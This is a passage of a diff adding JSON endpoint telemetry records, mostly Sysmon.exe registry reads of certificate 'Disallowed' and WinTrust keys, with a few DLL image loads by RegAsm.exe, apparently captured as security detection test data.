"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570863400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570863400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570863400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570863400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570863400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570863400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570863400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570863400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570863400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570863400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570863400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "apphelp.dll", + "image_path": "C:\\Windows\\SysWOW64\\apphelp.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570862150000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570863560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570863560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570863560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570863560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570863560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570863560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570863560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570863560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570863560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570863560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570863560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570863560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570863560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570863560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570863560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570863560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570863560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570863560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570863560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570863560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570863560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570863560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570863560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570863560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570863560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570863560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "AcLayers.dll", + "image_path": "C:\\Windows\\SysWOW64\\AcLayers.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570862150000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "image_load", + "image_name": "win32u.dll", + "image_path": "C:\\Windows\\SysWOW64\\win32u.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570862300000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570863710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570863710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570863710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570863710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570863710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570863710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570863710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570863710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570863710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570863710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570863710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570863710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570863710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570863710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570863710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570863710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570863710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570863710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570863710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570863710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570863710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570863710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570863710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570863710000, + "unique_pid": 